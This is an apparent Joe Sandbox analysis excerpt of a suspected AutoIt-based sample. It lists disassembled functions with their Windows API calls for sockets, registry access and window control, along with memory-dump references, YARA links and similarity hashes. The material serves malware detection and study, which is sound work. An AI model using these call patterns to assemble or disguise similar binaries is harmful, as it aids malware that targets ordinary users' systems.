                                                                                                                            • Instruction Fuzzy Hash: 22312D71D00109BFDF15DF90EC89EFFB7BCEF08310F140169E512A2141EA749E89AAA0
                                                                                                                            Function 00F662CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F662EC
                                                                                                                            • GetWindowLongW.USER32(01205408,000000F0), ref: 00F6631F
                                                                                                                            • GetWindowLongW.USER32(01205408,000000F0), ref: 00F66354
                                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F66386
                                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F663B0
                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00F663C1
                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F663DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2178440468-0
                                                                                                                            • Opcode ID: 54c937cf760c538a0dd244ca6248bd7114bb5dc97713833a303a598a80538706
                                                                                                                            • Instruction ID: 170c8cd4fc10b53107cd6a176d218a0033f499e093e3792706f7ebcc4dd2ec73
                                                                                                                            • Opcode Fuzzy Hash: 54c937cf760c538a0dd244ca6248bd7114bb5dc97713833a303a598a80538706
                                                                                                                            • Instruction Fuzzy Hash: 3631E231A44154AFEB20CF18EC86F5937E1FB4AB24F1901A4F525DF3B2CB72A844AB51
                                                                                                                            Function 00F3DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F3DB2E
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F3DB54
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00F3DB57
                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00F3DB75
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00F3DB7E
                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00F3DBA3
                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00F3DBB1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3761583154-0
                                                                                                                            • Opcode ID: e058d1808e32302172377df3974a0e7628a83ff74e5921d25045bb5aee5b4e62
                                                                                                                            • Instruction ID: 78274c87d763e96762d127bda4f14671b15f823c1d7c05c437c410458211b4cf
                                                                                                                            • Opcode Fuzzy Hash: e058d1808e32302172377df3974a0e7628a83ff74e5921d25045bb5aee5b4e62
                                                                                                                            • Instruction Fuzzy Hash: 96217F76A05219AFDB10DFA8EC88DBBB3ACEB49370B018565FD14DB290DB709C45A760
                                                                                                                            Function 00F56173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F57D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F57DB6
                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F561C6
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00F561D5
                                                                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F5620E
                                                                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00F56217
                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00F56221
                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00F5624A
                                                                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F56263
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 910771015-0
                                                                                                                            • Opcode ID: 83daf8e14055678d9c96c4640bde41573f05c46022657e3eb3ed5568fbe5712b
                                                                                                                            • Instruction ID: e46bce4cadbe274884d2871cc5c779a20d1e240703e208a707454dd0cb90a60b
                                                                                                                            • Opcode Fuzzy Hash: 83daf8e14055678d9c96c4640bde41573f05c46022657e3eb3ed5568fbe5712b
                                                                                                                            • Instruction Fuzzy Hash: C531A171600208AFDF10AF24DC85BBE7BE8EB45721F444069FE15E7291CB74AC08ABA1
                                                                                                                            Function 00F3F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsnicmp
                                                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                            • API String ID: 1038674560-2734436370
                                                                                                                            • Opcode ID: 37e39bb0a0630671092cc841cedd2b193270bbb7595189db3975d8cd93bef8ce
                                                                                                                            • Instruction ID: b980defd52a5d1f4d7c97d6bfade6764ffdc5c2ec6a789cc8b8148280377f33d
                                                                                                                            • Opcode Fuzzy Hash: 37e39bb0a0630671092cc841cedd2b193270bbb7595189db3975d8cd93bef8ce
                                                                                                                            • Instruction Fuzzy Hash: A1214672E1461266D330AA34EC03FBB73D8EF55370F54403AF846D6091EB559E4AF296
                                                                                                                            Function 00F3DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F3DC09
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F3DC2F
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00F3DC32
                                                                                                                            • SysAllocString.OLEAUT32 ref: 00F3DC53
                                                                                                                            • SysFreeString.OLEAUT32 ref: 00F3DC5C
                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00F3DC76
                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00F3DC84
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3761583154-0
                                                                                                                            • Opcode ID: ac23ea024a710f7cbb75e812dfa7cc5bcb9e508f150533455daf6f4395de1214
                                                                                                                            • Instruction ID: 4672bbb850b7fdbd7ea74906f7565d27bb6d9af638e8f18e63e1829c29cd0839
                                                                                                                            • Opcode Fuzzy Hash: ac23ea024a710f7cbb75e812dfa7cc5bcb9e508f150533455daf6f4395de1214
                                                                                                                            • Instruction Fuzzy Hash: D0213036614208AFDB10DBB8EC88DAB77ECEB09370B108125F914CB2A1DAB4DC45E764
                                                                                                                            Function 00F675CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EE1D73
                                                                                                                              • Part of subcall function 00EE1D35: GetStockObject.GDI32(00000011), ref: 00EE1D87
                                                                                                                              • Part of subcall function 00EE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EE1D91
                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F67632
                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F6763F
                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F6764A
                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F67659
                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F67665
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                            • Opcode ID: 520d1e155d748b2617b7aa0342c56119a44fcf049723ce0eae34eea623e7991c
                                                                                                                            • Instruction ID: 9c58035a8ba0a92f1c3bb68451b389d2d01d83a1fcff54e4778c70d5339cf9df
                                                                                                                            • Opcode Fuzzy Hash: 520d1e155d748b2617b7aa0342c56119a44fcf049723ce0eae34eea623e7991c
                                                                                                                            • Instruction Fuzzy Hash: 0611B2B211021DBFEF119F64CC85EE77F6DEF087A8F014114BA04A20A0CA729C21EBA4
                                                                                                                            Function 00F09AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __init_pointers.LIBCMT ref: 00F09AE6
                                                                                                                              • Part of subcall function 00F03187: EncodePointer.KERNEL32(00000000), ref: 00F0318A
                                                                                                                              • Part of subcall function 00F03187: __initp_misc_winsig.LIBCMT ref: 00F031A5
                                                                                                                              • Part of subcall function 00F03187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F09EA0
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F09EB4
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F09EC7
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F09EDA
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F09EED
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F09F00
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F09F13
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F09F26
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F09F39
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F09F4C
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F09F5F
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F09F72
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F09F85
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F09F98
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F09FAB
                                                                                                                              • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F09FBE
                                                                                                                            • __mtinitlocks.LIBCMT ref: 00F09AEB
                                                                                                                            • __mtterm.LIBCMT ref: 00F09AF4
                                                                                                                              • Part of subcall function 00F09B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F09AF9,00F07CD0,00F9A0B8,00000014), ref: 00F09C56
                                                                                                                              • Part of subcall function 00F09B5C: _free.LIBCMT ref: 00F09C5D
                                                                                                                              • Part of subcall function 00F09B5C: DeleteCriticalSection.KERNEL32(00F9EC00,?,?,00F09AF9,00F07CD0,00F9A0B8,00000014), ref: 00F09C7F
                                                                                                                            • __calloc_crt.LIBCMT ref: 00F09B19
                                                                                                                            • __initptd.LIBCMT ref: 00F09B3B
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00F09B42
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3567560977-0
                                                                                                                            • Opcode ID: 79336a102703551f6145b06985cb3cb5a2880fc5f0b6d41a4d67c419b6c4b0a3
                                                                                                                            • Instruction ID: 3c7bcc6dca6cf7395e58ec5f8889d5e331184873b842d66194f0b20845d1aaa3
                                                                                                                            • Opcode Fuzzy Hash: 79336a102703551f6145b06985cb3cb5a2880fc5f0b6d41a4d67c419b6c4b0a3
                                                                                                                            • Instruction Fuzzy Hash: 21F06D32A5E7115AEA24B774BC0764A3A949B42770B204A1AF4A4951D3FEE8854171A0
                                                                                                                            Function 00F0406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F03F85), ref: 00F04085
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00F0408C
                                                                                                                            • EncodePointer.KERNEL32(00000000), ref: 00F04097
                                                                                                                            • DecodePointer.KERNEL32(00F03F85), ref: 00F040B2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                                                            • API String ID: 3489934621-2819208100
                                                                                                                            • Opcode ID: c9c5c28f82beb0b1b998d06ec32e3bdedbc94e8a6d62e7b0049a29d8261ae76c
                                                                                                                            • Instruction ID: a30363acab6599cfb9a1eec755e91d72cacfa45c563a76b69085a1bdbc8ccd79
                                                                                                                            • Opcode Fuzzy Hash: c9c5c28f82beb0b1b998d06ec32e3bdedbc94e8a6d62e7b0049a29d8261ae76c
                                                                                                                            • Instruction Fuzzy Hash: C7E0BFB0E41308DFEB609F61FC0EB157AA4B705742F204025F125E11A0CBB69604FA15
                                                                                                                            Function 00EE1DB3 Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00EE1DDC
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00EE1E1D
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00EE1E45
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00EE1F74
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00EE1F8D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1296646539-0
                                                                                                                            • Opcode ID: 78ce8ef8ee1c60b1c2f17f917f5bca66d7abd4eb924d61d962e4a63ba4d4b425
                                                                                                                            • Instruction ID: f5c6ad124284dc11b6a7eb35bda6e5547c4e0b395f11679277155078eb226cc9
                                                                                                                            • Opcode Fuzzy Hash: 78ce8ef8ee1c60b1c2f17f917f5bca66d7abd4eb924d61d962e4a63ba4d4b425
                                                                                                                            • Instruction Fuzzy Hash: 18B16E79A0028DDBDF10CFA9C4807EDB7B1FF48314F149169EC59AB254DB70A980DB95
                                                                                                                            Function 00F464B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$__itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3253778849-0
                                                                                                                            • Opcode ID: b8725dfc3b8e9107be434ab14099c2fbccf84fb614c00f577f5f48245dd0dce5
                                                                                                                            • Instruction ID: 354afa1e405c0ade1eaa2a3f983a27ad643b15a2919399b781f19a469eea7a40
                                                                                                                            • Opcode Fuzzy Hash: b8725dfc3b8e9107be434ab14099c2fbccf84fb614c00f577f5f48245dd0dce5
                                                                                                                            • Instruction Fuzzy Hash: 2A618C7190029A9BCF05EF61CC82FFE3BA5AF05308F054529FD59AB192DB38D905EB51
                                                                                                                            Function 00F601E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F60E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5FDAD,?,?), ref: 00F60E31
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F602BD
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F602FD
                                                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F60320
                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F60349
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F6038C
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F60399
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4046560759-0
                                                                                                                            • Opcode ID: e408f8c19396836f2f975aa3a50ca20a66787cfb4b806d2b329a2891e21d4e2f
                                                                                                                            • Instruction ID: 3573569e51291636e3c7975acf0867f73c62dbc2cd07557fc1a9fe8aec6d3aaf
                                                                                                                            • Opcode Fuzzy Hash: e408f8c19396836f2f975aa3a50ca20a66787cfb4b806d2b329a2891e21d4e2f
                                                                                                                            • Instruction Fuzzy Hash: BB515871608244AFC700EF64D886E6FBBE8FF84314F14492DF5959B2A2DB31E904EB52
                                                                                                                            Function 00F65799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetMenu.USER32(?), ref: 00F657FB
                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00F65832
                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F6585A
                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00F658C9
                                                                                                                            • GetSubMenu.USER32(?,?), ref: 00F658D7
                                                                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F65928
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Item$CountMessagePostString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 650687236-0
                                                                                                                            • Opcode ID: 86453e2724b2d6b917422644027abdb8d2c8ecb4ad01971350312043ac1ba012
                                                                                                                            • Instruction ID: 288b365afe6654e425bbb720b4292666a2546017dc15d9c6b550f02127b4d820
                                                                                                                            • Opcode Fuzzy Hash: 86453e2724b2d6b917422644027abdb8d2c8ecb4ad01971350312043ac1ba012
